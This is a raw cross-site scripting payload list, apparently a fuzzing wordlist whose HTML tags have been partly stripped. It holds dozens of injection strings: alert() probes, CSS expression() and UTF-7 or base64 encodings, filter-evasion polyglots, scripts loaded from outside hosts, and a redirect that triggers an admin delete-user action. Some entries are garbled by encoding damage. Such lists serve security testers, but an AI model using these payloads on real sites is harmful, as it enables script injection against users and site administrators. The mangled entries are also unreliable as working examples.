CLICKME CLICKME XXX alert(1)0 "> "> foo=">"> foo=">"> <% foo> XXX X @import "data:,*%7bx:expression(javascript:alert(1))%7D"; XXXXXX X XXX XXX / style=x:expression\28javascript:alert(1)\29> X X X X XXX XXX &ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi & < XSS exp/* ÄÂÄšĹscriptÄÂĚŞalert(ÄÂĂÂXSSÄÂĂÂ)ÄÂÄšĹ/scriptÄÂĚŞ echo('alert("XSS")'); ?> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- PT SRC="http://ha.ckers.org/xss.js"> XSS XSS XSS XSS XSS XSS /***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/'> X |\>'' X click (1)> style="x:"> <--` --!> x "> CLICKME click ">Click Me '';!--"=&{()} '>//\\,<'>">">"*" '); alert('XSS "> ipt>alert('XSS');ipt> echo('alert(\"XSS\")'); ?> "> > window.alert("Bonjour !"); onload=alert('XSS')> "> '">>XSS =''?> " onfocus=alert(document.domain) "> <" XSS perl -e 'print \"alert(\"XSS\")\";' > out perl -e 'print \"\";' > out alert(1) "> [color=red width=expression(alert(123))][color] Execute(MsgBox(chr(88)&chr(83)&chr(83)))< "> '"> '"> '""> <<< (123) '> '>"> } a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d); ='> > ">/XaDoS/> ">/KinG-InFeT.NeT/> src="http://www.site.com/XSS.js"> data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4= !--" /> XSS by xss ">>XSS by xss '">>XSS by xss XSS by xss XSS by xss ">">>XSS by xss XSS by xss '> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'> '';!--"=&{()} %253Cscript%253Ealert('XSS')%253C%252Fscript%253E ">">123 ">123 ">123 ">123 ">123 >Hover the cursor to the LEFT of this Message&ParamHeight=250 ">">123 ">123